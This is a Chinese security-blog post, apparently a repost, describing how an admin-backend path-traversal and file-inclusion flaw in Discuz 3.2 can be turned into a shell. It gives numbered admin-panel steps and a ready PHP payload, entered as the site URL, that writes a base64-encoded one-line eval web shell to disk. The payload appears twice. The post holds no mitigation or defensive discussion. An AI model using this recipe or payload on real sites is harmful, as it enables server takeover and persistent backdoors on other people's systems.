纵有疾风起
人生不言弃

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全

由于创建专题时未对

静态化名称
做任何限制引发此漏洞
1.全局->站点信息

网站 URL:

http://www.comsenz.com/#<?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>

 

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图

 

2.工具->更新缓存

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图1

3.门户->HTML管理
静态文件扩展名: htm
专题HTML存放目录:data/cache

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图2

4.创建专题
静态化名称[此处未做任何限制]:../../template/default/portal/portal_topic_test

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图3

 

5.专题管理
对刚添加的专题 开启 并生成

 

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图4

6.再次创建专题
模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm
提交

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图5

就执行了php代码

 <?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>

 

不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

 

Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全插图6

 

    上一篇: 某漏洞可导致直捣letv内网 – 网站安全 – 自学php

    下一篇: Web 前端攻防 2014 – 网站安全 – 自学php
未经允许不得转载:起风网 » Discuz3.2漏洞文件包含漏洞可后台拿shell – 网站安全
分享到: 生成海报

评论 抢沙发

评论前必须登录!

立即登录